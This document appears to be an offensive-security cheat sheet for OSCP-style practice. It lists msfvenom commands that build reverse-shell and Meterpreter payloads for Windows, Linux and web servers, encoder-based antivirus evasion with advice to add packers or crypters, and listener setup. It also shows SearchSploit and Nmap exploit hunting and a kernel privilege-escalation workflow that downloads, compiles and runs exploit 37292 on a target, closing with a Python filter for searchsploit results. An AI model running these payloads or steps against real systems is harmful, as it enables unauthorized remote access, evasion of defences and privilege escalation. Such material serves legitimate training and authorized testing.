Exploit
MSFVenom Basics
# Syntax
msfvenom -p <PAYLOAD> LHOST=<ATTACKER_IP> LPORT=<PORT> -f <FORMAT> -o <FILENAME>
Windows Payloads
1. Reverse Shell (EXE)
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe
# 64-bit staged variant. Note the extra slash: shell/reverse_tcp is staged (sends a small
# stager that fetches the rest from the handler), shell_reverse_tcp is stageless.
# Staged payloads only work against exploit/multi/handler, not a plain netcat listener.
# syntax
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
# example
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=ATTACKER LPORT=4444
2. Meterpreter Reverse Shell (EXE)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o meterpreter.exe
3. PowerShell One-Liner (no file drop)
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f psh-cmd
Linux Payloads
1. Reverse Shell (ELF)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf
2. Meterpreter Reverse (Linux ELF)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o meterpreter.elf
3. Script Payloads (Bash / Python)
msfvenom -p cmd/unix/reverse_bash LHOST=ATTACKER LPORT=4444 -f raw
Web Payloads
1. PHP Reverse Shell
msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw > shell.php
2. ASP Reverse Shell (Windows)
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f asp > shell.asp
3. WAR Payload (Java/Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war > shell.war
Other Formats
-f exe # Windows EXE
-f elf # Linux ELF binary
-f asp # classic ASP page (Windows/IIS)
-f aspx # ASP.NET page (Windows/IIS)
-f war # Java web archive (Tomcat)
-f ps1 # PowerShell byte array of the shellcode only; you supply the loader
-f psh-cmd # PowerShell one-liner that runs as-is
-f raw # raw output (bash, python, php, etc.; use with cmd/* and script payloads)
-f js_le # JavaScript byte array of the shellcode (js_be for big-endian); there is no plain "js" format
# full list: msfvenom --list formats
Evade AV with Encoders (optional)
# Use encoder to obfuscate payload
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o evashell.exe
-e → encoder module
-i → number of iterations
Don't rely on encoding for AV evasion: encoders exist to strip bad characters, not to hide the payload, and shikata_ga_nai output is widely signatured. Combine with packers, crypters, or LOLBIN delivery.
Listener Setup
# msfconsole listener (multi/handler)
use exploit/multi/handler
# PAYLOAD must match what msfvenom built exactly (staged vs stageless, x86 vs x64)
set PAYLOAD windows/shell_reverse_tcp
set LHOST ATTACKER
set LPORT 4444
run
# or simple netcat listener (stageless payloads only; staged ones need the handler above)
nc -lvnp 4444
A lean, fast-action cheat sheet for SearchSploit and Nmap NSE scripts, aimed at OSCP-style recon and exploit hunting.
SearchSploit (Offline Exploit Search)
Install / Update ExploitDB
sudo apt update && sudo apt install exploitdb # install (or upgrade the package)
searchsploit -u # update the local copy of the database
Basic Search
searchsploit apache struts
searchsploit linux kernel 2.6.22
Title-only search
searchsploit -t wordpress
Copy Exploit Locally
searchsploit -m 48537 # by EDB-ID
searchsploit -m windows/remote/42031.py
Show Full Path
searchsploit -p 48537
Get Online Link Instead
searchsploit --www 48537
Exclude False Positives
searchsploit smb windows --exclude="(dos|PoC)"
JSON Output (for parsing)
searchsploit -j eternalblue | json_pp
Searchsploit Directory
/usr/share/exploitdb/
Nmap NSE (Scripted Scanning + Exploits)
Script Directory
/usr/share/nmap/scripts/
Find Exploits in NSE
grep -l 'categories.*exploit' /usr/share/nmap/scripts/*.nse # scripts in the "exploit" category
grep Exploits /usr/share/nmap/scripts/*.nse # scripts whose description mentions "Exploits"
List All Scripts (Optional)
ls /usr/share/nmap/scripts/
Run Script Against Target
nmap -p80 --script=http-fileupload-exploiter $IP
Search by Category
nmap --script "vuln" $IP
Help for a Script
nmap --script-help=http-fileupload-exploiter.nse
Kernel Exploit
# find the kernel
uname -a
# search for a matching exploit; check the title's version range and distro, not just the number
searchsploit linux kernel 3.13.0
# pull it in with searchsploit
searchsploit -m 37292
# host the file (http.server listens on 8000 by default; the port argument makes it explicit)
python3 -m http.server 8000
# pull onto box (curl needs -O to save the file instead of printing it; wget works too)
curl -O http://10.10.10.10:8000/37292.c
# compile on the target if gcc is present; otherwise compile on a box with the same
# architecture and a compatible glibc and copy the binary over
gcc 37292.c -o exploit
# run
./exploit
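The two steps above that are easiest to get wrong are reading the JSON that searchsploit -j emits and deciding whether a hit actually covers the running kernel (the "3.13.0 < 3.19" range in a title, the DoS/PoC noise that --exclude drops). The script below is an added example, not part of this page or of the searchsploit project: it parses a constructed sample of searchsploit -j output (the field names RESULTS_EXPLOIT, Title, EDB-ID, Type, Platform and Path are assumed from the tool's JSON format; 37292 is the real overlayfs entry named above, the 0000x entries are fictitious filler to exercise the filters), turns uname -r into a version tuple, and keeps only local Linux exploits whose title range contains that version.

```python
import json
import re

# Constructed sample of `searchsploit -j "linux kernel 3.13"` output. The
# field layout is assumed from searchsploit's JSON format; 37292 is the real
# overlayfs entry from this page, the 0000x entries are fictitious filler.
SAMPLE_JSON = """{
  "SEARCH": "linux kernel 3.13",
  "DB_PATH_EXPLOIT": "/usr/share/exploitdb",
  "RESULTS_EXPLOIT": [
    {"Title": "Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation",
     "EDB-ID": "37292", "Type": "local", "Platform": "linux",
     "Path": "/usr/share/exploitdb/exploits/linux/local/37292.c"},
    {"Title": "Linux Kernel 3.13 - Constructed Filler Entry (DoS)",
     "EDB-ID": "00001", "Type": "dos", "Platform": "linux",
     "Path": "/usr/share/exploitdb/exploits/linux/dos/00001.c"},
    {"Title": "Linux Kernel 3.13.0 < 3.19 - Constructed Filler Entry (PoC)",
     "EDB-ID": "00002", "Type": "local", "Platform": "linux",
     "Path": "/usr/share/exploitdb/exploits/linux/local/00002.c"},
    {"Title": "Linux Kernel 4.4.0 < 4.8 - Constructed Filler Local Privilege Escalation",
     "EDB-ID": "00003", "Type": "local", "Platform": "linux",
     "Path": "/usr/share/exploitdb/exploits/linux/local/00003.c"}
  ],
  "RESULTS_SHELLCODE": []
}"""

# "Linux Kernel 3.13.0 < 3.19 ..." -> low (inclusive) and optional high (exclusive)
VERSION_RE = re.compile(r"Linux Kernel (\d+(?:\.\d+)*)(?:\s*<\s*(\d+(?:\.\d+)*))?")


def parse_kernel(uname_r):
    """Turn `uname -r` output such as '3.13.0-24-generic' into (3, 13, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError(f"unrecognised kernel release: {uname_r!r}")
    return tuple(int(x or 0) for x in m.groups())


def _vtuple(text):
    return tuple(int(x) for x in text.split("."))


def title_version_range(title):
    """Extract (low_inclusive, high_exclusive) from an EDB title; high is None
    when the title names a single version, which is then treated as a prefix."""
    m = VERSION_RE.search(title)
    if not m:
        return None
    low = _vtuple(m.group(1))
    high = _vtuple(m.group(2)) if m.group(2) else None
    return low, high


def kernel_in_range(running, low, high):
    """Zero-pad the tuples to equal width, then check low <= running < high."""
    if high is None:
        return running[:len(low)] == low
    width = max(len(running), len(low), len(high))

    def pad(t):
        return t + (0,) * (width - len(t))

    return pad(low) <= pad(running) < pad(high)


def candidates(json_text, uname_r, exclude=r"\b(dos|PoC)\b", platform="linux"):
    """Filter searchsploit -j results to entries whose title range covers the
    running kernel, dropping DoS/PoC noise the way --exclude="(dos|PoC)" does."""
    running = parse_kernel(uname_r)
    drop = re.compile(exclude, re.IGNORECASE)
    hits = []
    for entry in json.loads(json_text)["RESULTS_EXPLOIT"]:
        if entry.get("Platform") != platform or drop.search(entry["Title"]):
            continue
        rng = title_version_range(entry["Title"])
        if rng is None or not kernel_in_range(running, *rng):
            continue
        hits.append({"EDB-ID": entry["EDB-ID"], "Title": entry["Title"], "Path": entry["Path"]})
    return hits


if __name__ == "__main__":
    # In practice: candidates(subprocess.check_output(["searchsploit", "-j", q]).decode(), uname_r)
    for hit in candidates(SAMPLE_JSON, "3.13.0-24-generic"):
        print(hit["EDB-ID"], hit["Path"])
```

A version match is a hint, not a verdict: distro kernels backport fixes without bumping the upstream version string, so confirm the distro and patch level named in the title (and test on a matching VM) before running anything on the target.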